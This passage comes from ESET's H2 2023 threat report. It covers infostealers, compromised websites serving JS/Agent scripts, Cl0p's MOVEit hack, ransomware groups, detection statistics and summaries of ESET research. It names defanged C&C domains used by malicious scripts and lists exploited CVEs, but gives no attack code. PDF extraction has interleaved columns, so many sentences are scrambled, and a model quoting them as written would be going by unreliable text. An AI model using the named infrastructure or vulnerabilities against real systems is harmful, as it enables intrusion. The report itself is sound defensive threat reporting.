page to capture the user data. At ESET, we detect the of all Infostealer detections in the country. This is also
background, PSWs can record keystrokes, capture already mostly inactive by that time. We have not
code snippet loader hidden within the 404 pages as the case in Italy, the country with the second highest
screenshots, or directly steal saved passwords from the seen much Qbot activity since the middle of the year
JS/Spy.Banker.MC. numbers of JS/Spy.Banker detections globally (11%). This
users’ browsers or other applications. – the last campaign we tracked occurred in the latter
threat represents 42% of Infostealer detections ESET
The abuse of HTML error pages is an established half of June. We have occasionally noticed some Qbot
telemetry registered there Fueling this surge are numerous new PSWs
cybercriminal technique. For example, the now-defunct C&C server detections since the takedown took place,
discovered by security researchers in H2 2023, such
but some of the servers in question had already been
as Metastealer, Pureland, Realst Infostealer,
neutralized by the authorities.
ShadowVault macOS Stealer, MacStealer, and
AMOS. Posing as specific files or useful apps, these
infostealers spread via malicious websites, malvertising,
15%
and phishing. In addition to stealing passwords and
exfiltrating various file types, they can also extract
0% credit card information and target cryptocurrency
wallets. Despite the sharp rise in PSWs, even though
the total numbers are rather low, it’s worth noting
that the overall category of Infostealers on macOS has
increased only slightly in H2 2023 by 10%.
Geographic distribution of JS/Spy.Banker detections in H2 2023
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 21

Web threats

Website visitors
under siege by
malicious scripts
The rise in JS/Agent detections reveals that almost 45,000 websites have fallen victim to
malicious JavaScript code.

A threat contender has risen 111% to take second place deliver payloads such as backdoors. JS/Agent detection trend from January 2021 to November 2023, seven-day moving average

among all threats recorded by ESET telemetry in H2

Most of the increase in JS/Agent detections was due to
2023: JS/Agent. This detection name refers to malicious
the 136% growth of the JS/Agent.PHC variant and the
JavaScript code loaded by compromised web pages.
appearance of the .RAN and .RAW variants. The .PHC
From September 2023, we have observed a massive
variant includes the ndsj malware Sucuri reported EXPERT COMMENT
wave of JS/Agent detections – the likes of which have
on in June 2022. This malware consists of lightly
not been seen in the past three years. Website admins should be wary of which plugins they install, especially for WordPress,
obfuscated JavaScript that executes the next stage,
as this dramatically increases the attack surface. Make sure to put in place a patching
As can be seen in the Magecart section, threat actors usually a malicious PHP script already present on the
are known to attempt to exploit website vulnerabilities compromised web server and whose job is to fetch a
policy that requires admins to apply updates as soon as they are available. Teach your web
that may allow them to inject malicious JavaScript code JavaScript payload from a C&C server. developers about secure coding practices such as data sanitization, secure HTTP headers,
into web pages. Such code is typically the beginning and a Content Security Policy to prevent multiple types of script injection attacks.
The most prevalent detections of JS/Agent.PHC were
of a chain of scripts that allows attackers to download
in Japan (10%), Spain (8%), and the US (6%). From Ján Adámek, ESET Senior Detection Engineer
further malicious scripts, which can take over admin
September to November, ESET telemetry recorded
access to the site, install malicious web plugins, or
14,500 websites compromised with the .PHC variant.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 22

The .RAN and .RAW variants include malicious The .RAN and .RAW variants and 37 other related JS/
JavaScript detected as part of a Balada Injector Agent variants add up to over 900,000 detections
campaign reported by Sucuri in October 2023. Both in the second half of 2023. This indicates that many
these variants are distinct, lightly obfuscated scripts websites have been compromised in this period,
but with a similar purpose: downloading the next- probably due to attackers exploiting website
stage JavaScript code from a C&C server. For example, vulnerabilities such as CVE-2023-3169, which affects
some .RAN samples download a script from stay. specific versions of the tagDiv Composer plugin for
decentralappps[.]com, and some .RAW samples WordPress, as reported in our ESET Security Forum.
reach out to cdn.statisticscripts[.]com.
The most prevalent detections of these 39 variants
The .RAN variant accounts for the spike on September were in Italy (10%), Czechia (7%), and Poland (7%). From
21, the largest one seen in the past three years. September to November, ESET telemetry recorded
Successive waves of detections are mainly due to the 6,700 websites compromised with the .RAN variant,
RAW variant. and 23,500 with the .RAW variant. JS/Agent.RAN and JS/Agent.RAW detection trends from September 2023 to November 2023

JS/Agent.PHC detection trend in H2 2023

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 23

Ransomware

Cl0p and its MOVEit hack: A mass-spreading

yet targeted attack
How exploitation of a two-year-old zero day vulnerability by one actor caused a global
cybersecurity nightmare.

The biggest ransomware story of H2 2023 doesn’t About a week later, the range of impact started to
EXPERT COMMENT
even include ransomware per se. What qualifies the become apparent as information about high-profile Looking back at 2023, we can safely say that ransomware was more active than in 2022.
so-called “MOVEit hack” for this chapter is that it was victims – such as the BBC, British Airways, and Aer Based on published information and the incidents we investigated, the ransom demands
carried out by a cybercriminal group known as Cl0p Lingus – started rolling in. It was about the same grew also, although it is difficult to assess whether this was due to the greed of the
(aka Lace Tempest, FIN11, TA505, or Evil Corp) infamous time that Microsoft first attributed the attack to the attackers; victims being less willing to pay, which in turn forced attackers to look for revenue
for using ransomware in large-scale hacks. However, Cl0p gang, which in turn confirmed it via media and in masses; or if the adjustment was influenced by high inflation.
its latest campaign reached such proportions that bragged that the number of compromised companies
The story that stood out most to us was surely the MOVEit hack. However, it wasn’t just
encrypting every victim was probably too laborious was in the hundreds.
the size of the campaign that made it so prominent, but also the technical proficiency of the
even for this group.
Six months later, the number of affected organizations Cl0p gang that was behind the attack. These threat actors demonstrated they can find a
It all started on May 27, the first day of the US has surpassed 2,600 – at least according to new zero-day vulnerability, weaponize it, and wait for the opportune moment to deploy it.
Memorial Day long weekend, when the cybercriminals Emsisoft’s monitoring. The list of victims includes
launched a massive exploitation of a zero-day US governmental agencies, schools and universities, In 2024, we expect most of the outlined trends to continue, with current major players
vulnerability (CVE-2023-34362) in the widely used healthcare institutions, and also global corporations focusing on expansion of their affiliate programs. By employing other cybercriminals within
managed transfer app MOVEit. The flaw, which the such as Sony, EY, and PricewaterhouseCoopers. If their schemes, notable families will limit the space for emergence of new competitors.
attackers probably sat on since 2021, allowed them to the 83 million records of individuals that were leaked
Jakub Souček, ESET Senior Malware Researcher
escalate their privileges and gain unauthorized access are multiplied by IBM’s average cost of USD 165 per
to stored and transferred data. breached record, that puts the estimated financial
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 24

damage of the hack close to USD 14 billion. That’s more than the USD 10 observed any in-the-wild attacks using ScRansom, the situation changed LostTrust
billion damage caused by the infamous NotPetya incident. shortly afterwards and this variant is now the preferred ransomware
LostTrust ransomware is a likely rebrand of the MetaEncryptor
deployed by the CosmicBeetle group, replacing it’s former main payload
Early estimates say Cl0p could pull in as much as USD 75–100 million from its ransomware used by the same cybercriminal actors.
choice - Scarab ransomware.
victims. Due to severity of the incident – and probably its heavy focus on the US
SophosEncrypt
and Canada – the US Department of State has issued a USD 10 million bounty In some of its recent attacks, the threat actor modified the ransom note
It is not uncommon for cybercriminals to try to pin their activity on
for any information leading to the arrest and conviction of the perpetrators. to impersonate LockBit and even set up a surface web leak site, mimicking
cybersecurity researchers and organizations. SophosEncrypt is an example
LockBit’s. There, they copied a few of the most recent LockBit victims and
The MOVEit hack could also point to a new trend in the ransomware scene,
of ransomware where threat actors are trying to “sell” their product as if it
added some of their own. CosmicBeetle is likely abusing LockBit’s well-
as Cl0p started using the clear web to leak the stolen information. This
came from a known security company, Sophos.
known name in order increase pressure on its own victims.
move was first seen in June 2023 with the ALPHV ransomware gang (aka
NoEscape
BlackCat) and makes this kind of cyberincident much more visible, increasing To gain an initial foothold, CosmicBeetle uses several attack avenues,
pressure on the victim. In an attempt to avoid takedowns, Cl0p also leaked including RDP brute forcing and exploitation of the ZeroLogon vulnerability A new ransomware family called NoEscape has caught attention of
part of the information via torrents due to the sheer volume of data stolen. (CVE-2020-1472). With low confidence, ESET researchers also assess that researchers and media in July 2023. Based on code similarity in its
CosmicBeetle may be abusing a vulnerability in FortiOS, based on a “Forti” encryptor, experts suggest it could be a rebrand of a once prominent
Two other new trends in H2 have been highlighted by the FBI. First was the
string found in the code and the fact that the vast majority of its victims ransomware strain, known as Avaddon, whose operators closed shop in
deployment of two or more ransomware variants during the same incident,
have devices running FortiOS in their environment. 2021. According to the list on NoEscape’s darkweb leak site, the NoEscape
usually a choice of the AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum,
The Spacecolon toolset consists of three tools: the main orchestrator called group has already compromised at least a hundred companies in H2 2023.
and Royal families. Second was the use of wipers on top of data theft and
ransomware encryption. This way attackers can corrupt data in compromised ScHackTool, used to deploy a small component ScInstaller, which in turn Hunters International
systems after a set time and thus further increase pressure on the victim. installs CosmicBeetle’s backdoor ScService. The latter allows the attacker
Is Hive back? In H2 2023, the new ransomware as a service operation
to execute commands, retrieve information about victims’ systems and
CosmicBeetle replaces Scarab ransomware download and execute payloads – for details refer to our original analysis.
named Hunters International was launched. Upon analyzing its encryptor,
several security researchers found major code overlap with Hive – a
with its own ScRansom criminal service that was infiltrated and then dismantled by law
NOTABLE NEW PLAYERS AND REBRANDS
In H2 2023, ESET researchers took a closer look at CosmicBeetle – a Turkish- enforcement early in H1 2023. The threat actors behind the new Hunters
3AM International deny any relationship to Hive and claim they’ve bought and
speaking threat actor that uses the small Spacecolon (Sc) toolset to deploy
ransomware all over the world. A new Rust-based ransomware made headlines in September, fixed the old code from the previous operators. As for victims, Hunters’ leak
attracting researchers’ attention mostly by being deployed as a site lists dozens of compromised organizations, mostly from the United
ESET researchers also discovered a new ransomware strain in development, backup variant after a failed attempt to run LockBit ransomware. States and Europe.
naming it ScRansom and attributing it with high confidence to the same Since then, 3AM has been used to attack more than a dozen other
threat actor. While at the time of our initial publication we haven’t victims, spilling their information via a newly set up Tor leak site.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 25

ARRESTED/CLOSED SHOP/DECRYPTED: ARRESTED: LockBit (affiliate)

HACKED: Trigona While the arrest of a LockBit affiliate took place early in 2023, US
authorities only unveiled the charges and expected penalty in June 2023.
The Trigona ransomware gang saw their servers infiltrated and wiped by
The US Department of Justice is asking the courts to send the Russian
Ukrainian cyberactivists. The Ukrainian Cyber Alliance (UCA) also claimed
Ruslan Magomedovich Astamirov to jail for up to 25 years.
that they exfiltrated source code, internal communication, database
records, and other data from Trigona's systems. This might include DECRYPTOR: Key Group
decryption keys; however, UCA didn’t provide any further updates. Based on flaws in its encryption scheme, researchers created a decryptor
ARRESTED: Ragnar Locker for the Key Group ransomware. The free tool helps victims hit by the early
versions of the ransomware. Key Group has been active since 2023, and is
In late October, law enforcement agents took action against the Ragnar
labeled as a Russian-speaking actor.
Locker ransomware family, interviewing five suspects and arresting
one key individual. Physical raids were conducted in Czechia, Spain, and DECRYPTOR: Akira
Latvia; seizure of infrastructure took place in the Netherlands, Germany, A decryption tool is also available for the Akira ransomware, which has
and Sweden. The dark web site was also taken down, and replaced with been active since 2023 attacking various sectors across the globe.
information about the operation. Ragnar Locker had been active since 2019,
BOUNTY: Cl0p
attacking critical infrastructure including the Portuguese national carrier
and a hospital in Israel. Due to the severity of the MOVEit hack the US Department of State has
issued a USD 10 million bounty for any information leading to the arrest
LEAKED CODE: HelloKitty
and conviction of the perpetrators known as the Cl0p gang.
Source code for more ransomware has been leaked, this time it seems by
ARRESTED: MegaCortex, HIVE, LockerGoga, Dharma
the malicious actors behind the HelloKitty family themselves. The code for
the first version of their malware appeared on a Russian-speaking forum Europol, Eurojust, and agencies from seven countries have dismantled an
accompanied by claims of work on a new, more powerful encryptor. This organized group of ransomware actors whose attacks affected more than
leaked code can – and probably will – lead to a series of newcomers who 1,800 victims in 71 countries. All five suspects were taken into custody in
will try to utilize the information. Ukraine, including a 32-year-old ringleader. A total of 30 locations were
searched. This action followed a first round of arrests from 2021.
 Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 26

Threat
telemetry
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 27

All threats

H1 H2
-2%

10%

0%

Overall threat detection trend in H1 2023 and H2 2023, seven-day moving average Geographic distribution of malware detections in H2 2023

HTML/Phishing.Agent trojan 23.4%

JS/Agent trojan 10.1%

DOC/Fraud trojan 9.4%

Win/Exploit.CVE-2017-11882 trojan 8.3%

HTML/Phishing trojan 5.2%

PDF/Phishing trojan 2.9%

MSIL/TrojanDownloader.Agent trojan 2.9%

LNK/Agent trojan 2.5%

HTML/Fraud trojan 1.9%

JS/ScrInject trojan 1.5%

Top 10 malware detections in H2 2023 (% of malware detections)

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 28

Android

H1 H2
+22%

15%

0%

Detection trends of selected Android detection categories in H1 2023 and H2 2023, seven-day moving average (trends of Clickers, Cryptominers, Geographic distribution of Android detections in H2 2023
Ransomware, Scam apps, SMS trojans, and Stalkerware are combined in the trendline Other)

Android/TrojanDropper.Agent trojan 27.1%

Android/Agent trojan 8.3%

Android/AdDisplay.HiddAd PUA 7.3%

Android/Hiddad trojan 6.4%

Android/AdDisplay.MobiDash PUA 5.1%

Android/Spy.Agent trojan 4.5%

Android/Spy.SpinOk trojan 4.3%

Android/Andreed trojan 3.9%

Android/SpyLoan PUA 3.5%

Android/AdDisplay.Fyben PUA 3.4%

Top 10 Android detections in H2 2023 (% of malware detections)

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 29

Cryptocurrency threats

H1 H2
-19%

10%

0%

Cryptocurrency threat detection trend in H1 2023 and H2 2023, seven-day moving average Geographic distribution of Cryptocurency threat detections in H2 2023

Win/CoinMiner PUA 35.6%

Win/CoinMiner trojan 15.9%

JS/CoinMiner PUA 12.7%

NSIS/CoinMiner trojan 6.6%

BAT/CoinMiner trojan 6.2%

MSIL/CoinMiner PUA 4.9%

Win/Spy.Agent trojan 4.3%

WASM/CoinMiner PUA 3.7%

MSIL/CoinMiner trojan 2.7%

JS/CoinMiner trojan 2.0%

Top 10 Cryptocurrency threat detections in H2 2023 (% of malware detections)

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 30

Downloaders
2.1% 1.9%

H1 H2 4.0% MSIL
+10% 5.5%
Win
29.7%
7.0%
JS

VBA
8.7%

DOC

9.3% PowerShe
ll
18.8% Other
12.9%

Downloader detection trend in H1 2023 and H2 2023, seven-day moving average Downloader detections per detection type in H2 2023

MSIL/TrojanDownloader.Agent trojan 26.3%

Win/TrojanDownloader.ModiLoader trojan 13.3%

VBA/TrojanDownloader.Agent trojan 9.3%

JS/Danger trojan 8.7%

12%
DOC/TrojanDownloader.Agent trojan 8.7%

PowerShell/TrojanDownloader.Agent trojan 7.0%

0%
VBS/TrojanDownloader.Agent trojan 4.0%

MSIL/TrojanDownloader.Agent_AGen trojan 2.9%

JS/TrojanDownloader.Nemucod trojan 2.2%

JS/TrojanDownloader.Agent trojan 1.9%

Top 10 Downloader detections in H2 2023 (% of malware detections) Geographic distribution of Downloader detections in H2 2023
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 31

Email threats

H1 H2 HTML/Phishing.Agent trojan

DOC/Fraud trojan 15.5%

34.3%

-8%
Win/Exploit.CVE-2017-11882 trojan 13.1%

HTML/Phishing trojan 7.0%

MSIL/TrojanDownloader.Agent trojan 4.2%

PDF/Phishing trojan 2.5%

HTML/Fraud trojan 2.4%

Win/TrojanDownloader.ModiLoader trojan 2.4%

JS/Danger.ScriptAttachment trojan 1.5%

DOC/TrojanDownloader.Agent trojan 1.4%

Malicious email detection trend in H1 2023 and H2 2023, seven-day moving average Top 10 threats detected in emails in H2 2023

H1 H2
0.6% 0.1% 0.01%
1.2%

+6% 3.0%
Scripts
10.0%
Executables
Office documents
11.1%
PDF
Archives
53.9%
Batch
Shortcuts
20.1% Jar
Android

Spam detection trend in H1 2023 and H2 2023, seven-day moving average Top malicious email attachment types in H2 2023
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 32

Email threats Exploits

H1 H2
+5%

15%

0% -2%

-1%

Geographic distribution of Email threat detections in H2 2023 Trends of RDP, SMB and SQL attack attempts in H1 2023 and H2 2023, seven-day moving average

Password guessing

Apache Struts2 CVE-2017-5638

19.5%
Apache spring4j CVE-2022-22963,22965

0.4% Apache log4j CVE-2021-44228

2.4% 42.6%
0.8% SMB.DoublePulsar scan
2.8%
3.9% MS IIS CVE-2015-1635

5.5% Pulse Secure CVE-2019-11510

8.0%
MS SMB1 EternalBlue

14.0% MS RDP CVE-2019-0708 Bluekeep

Other

External network intrusion vectors reported by unique clients in H2 2023

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 33

Exploits

16% 43%

0% 0%

Geographic distribution of RDP password guessing attack attempt sources in H2 2023 Geographic distribution of SMB password guessing attack attempt targets in H2 2023

13% 10%

0% 0%

Geographic distribution of RDP password guessing attack attempt targets in H2 2023 Geographic distribution of SQL password guessing attack attempt targets in H2 2023
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 34

Exploits Infostealers

H1 H2 H1 H2
+9% -9%

Detection trend of Log4Shell exploitation attempts in H1 2023 and H2 2023, seven-day moving average Infostealer detection trend in H1 2023 and H2 2023, seven-day moving average

MSIL/Spy.AgentTesla trojan 14.7%

JS/Spy.Banker trojan 13.7%

PHP/Webshell backdoor 6.1%

Win/Formbook trojan 5.9%

43%
MSIL/Spy.Agent trojan 3.0%

ASP/Webshell backdoor 2.4%

0%
PHP/Agent backdoor 2.0%

Win/HoudRat trojan 1.8%

Win/Korplug backdoor 1.7%

Win/Spy.Agent trojan 1.7%

Geographic distribution of Log4Shell exploitation attempts in H2 2023 Top 10 Infostealer families in H2 2023 (% of Infostealer detections)
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 35

Infostealers macOS

H1 H2
+2%

8%

0%

Geographic distribution of Infostealer detections in H1 2023 macOS detection trend in H1 2023 and H2 2023, seven-day moving average

OSX/Mackeeper PUA 36.4%

OSX/Pirrit adware 9.1%

OSX/Bundlore adware 4.8%

OSX/TrojanDownloader.Adload trojan 4.6%

OSX/Keygen PUsA 4.5%

OSX/Genieo adware 4.4%

OSX/GT32SupportGeeks PUA 4.2%

OSX/BuhoCleaner PUA 3.5%

OSX/TrojanProxy.Agent trojan 2.7%

OSX/MaxOfferDeal adware 2.1%

Top 10 macOS detections in H2 2023 (% of macOS detections)

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 36

macOS Ransomware

H1 H2
-15%
19%

0%

Geographic distribution of macOS detections in H2 2023 Ransomware detection trend in H1 2023 and H2 2023, seven-day moving average

Win/Filecoder.STOP trojan 12.2%

MSIL/Filecoder trojan 8.4%

Win/Filecoder.WannaCryptor trojan 8.0%

Win/Filecoder trojan 7.9%

Win/Filecoder.BlackMatter trojan 5.2%

Win/Filecoder.Phobos trojan 3.6%

PowerShell/Filecoder trojan 2.8%

Win/Filecoder.GandCrab trojan 2.7%

Python/Filecoder trojan 2.7%

Win/LockScreen trojan 2.6%

Top 10 Ransomware detections in H2 2023 (% of Ransomware detections)

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 37

Ransomware Web threats

H1 H2
+2%

10%

0%

Geographic distribution of Ransomware detections in H2 2023 Web threat block trend in H1 2023 and H2 2023, seven-day moving average

H1 H2
+28%

Unique URL block trend in H1 2023 and H2 2023, seven-day moving average
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 38

Web threats

14%

0%

Global distribution of Web threat blocks in H2 2023

33%

0%

Global distribution of blocked domain hosting in H2 2023

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 39

Research publications
Asylum Ambuscade: Crimeware or Android GravityRAT goes after WhatsApp What’s up with Emotet?
cyberespionage? backups A brief summary of what happened with Emotet since its
A curious case of a threat actor at the border between ESET researchers analyzed an updated version of Android comeback in November 2021
crimeware and cyberespionage GravityRAT spyware that steals WhatsApp backup files and
can receive commands to delete files

ESET Research Podcast: Finding the MoustachedBouncer: Espionage against ESET Research Podcast: Unmasking
mythical BlackLotus bootkit foreign diplomats in Belarus MoustachedBouncer
Here’s a story of how an analysis of a supposed game cheat Long-term espionage against diplomats, leveraging email- Listen as ESET's Director of Threat Research Jean-Ian
turned into the discovery of a powerful UEFI threat based C&C protocols, C++ modular backdoors, and adversary- Boutin unravels the tactics, techniques and procedures of
in-the-middle (AitM) attacks… Sounds like the infamous MoustachedBouncer, an APT group taking aim at foreign
Turla? Think again! embassies in Belarus

Mass-spreading campaign targeting Zimbra Scarabs colon-izing vulnerable servers Telekopye: Hunting Mammoths using
users Analysis of Spacecolon, a toolset used to deploy Scarab Telegram bot
ESET researchers have observed a new phishing campaign ransomware on vulnerable servers, and its operators, Analysis of Telegram bot that helps cybercriminals scam
targeting users of the Zimbra Collaboration email server. CosmicBeetle people on online marketplaces

BadBazaar espionage tool targets Android Sponsor with batch-filed whiskers: Ballistic ESET Research Podcast: Sextortion, digital
users via trojanized Signal and Telegram Bobcat’s scan and strike backdoor usury and SQL brute-force
apps ESET Research uncovers the Sponsoring Access campaign, Closing intrusion vectors force cybercriminals to revisit old
ESET researchers have discovered active campaigns linked which utilizes an undocumented Ballistic Bobcat backdoor we attack avenues, but also to look for new ways to attack their
to the China-aligned APT group known as GREF, distributing have named Sponsor victims
espionage code that has previously targeted Uyghurs

OilRig’s Outer Space and Juicy Mix: Same ol’ Stealth Falcon preying over Middle Eastern Lazarus luring employees with trojanized
rig, new drill pipes skies with Deadglyph coding challenges: The case of a Spanish
ESET researchers document OilRig’s Outer Space and Juicy ESET researchers have discovered Deadglyph, a sophisticated aerospace company
Mix campaigns, targeting Israeli organizations in 2021 and backdoor used by the infamous Stealth Falcon group for While analyzing a Lazarus attack luring employees of an
2022 espionage in the Middle East aerospace company, ESET researchers discovered a publicly
undocumented backdoor
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 40

Operation Jacana: Foundling hobbits in Operation King TUT: The universe of Winter Vivern exploits zero-day
Guyana threats in LATAM vulnerability in Roundcube Webmail
ESET researchers discovered a cyberespionage campaign ESET researchers reveal a growing sophistication in threats servers
against a governmental entity in Guyana affecting the LATAM region by employing evasion techniques ESET Research recommends updating Roundcube Webmail to
and high-value targeting the latest available version as soon as possible

Who killed Mozi? Finally putting the IoT Unlucky Kamran: Android malware spying Telekopye: Chamber of Neanderthals’
zombie botnet in its grave on Urdu-speaking residents of Gilgit- secrets
How ESET Research found a kill switch that had been used to Baltistan Insight into groups operating Telekopye bots that scam
take down one of the most prolific botnets out there ESET researchers discovered Kamran, previously unknown people in online marketplaces
malware, which spies on Urdu-speaking readers of Hunza
News

ESET APT Activity Report Q2–Q3 2023

An overview of the activities of selected APT groups
investigated and analyzed by ESET Research in Q2 and Q3
2023
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 41

Credits About the data

Team Contributors
in this report
Peter Stančík, Team Lead Anton Mäčko The threat statistics and trends presented in this report This data was processed with the honest intention to
Hana Matušková, Managing Editor Dušan Lacika are based on global telemetry data from ESET. Unless mitigate all known biases, in an effort to maximize the
Igor Kabina explicitly stated otherwise, the data includes detections value of the information provided.
Aryeh Goretsky
Ivan Bešina regardless of the targeted platform.
Branislav Ondrášik Most of the charts in this report show detection trends
Jakub Souček
Bruce P. Burrell Further, the data excludes detections of potentially rather than provide absolute numbers. This is because
Ján Adámek
Klára Kobáková unwanted applications, potentially unsafe applications the data can be prone to various misinterpretations,
Ján Šugarek
Nick FitzGerald and adware, except where noted in the more detailed, especially when directly compared to other telemetry
Jiří Kropáč
Ondrej Kubovič platform-specific sections and in the Cryptocurrency data. However, absolute values or orders of magnitude
Ladislav Janko
Rene Holt threats section. are provided where deemed beneficial.
Lukáš Štefanko
Zuzana Pardubská
Martin Červeň
Michal Kopera
Michal Malík
Michal Škuta
Milan Fránik
Miloš Čermák
Patrik Sučanský
Vladimír Šimčák
Witold Gerstendorf
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 42

About ESET
For more than 30 years, ESET has been developing WeLiveSecurity.com
industry-leading IT security software and services to @ESETresearch
deliver comprehensive, multilayered protection against
ESET GitHub
cybersecurity threats for businesses and consumers
ESET Threat Reports and APT Activity Reports
worldwide. ESET has long pioneered machine learning
and cloud technologies that prevent, detect and respond
to malware. ESET is a privately owned company that
promotes scientific research and development worldwide.

© 2023 ESET, spol. s r.o. - All rights reserved.

Trademarks used herein are trademarks or registered trademarks of ESET, spol. s r.o. (eset):research
All other names and brands are registered trademarks of their respective companies.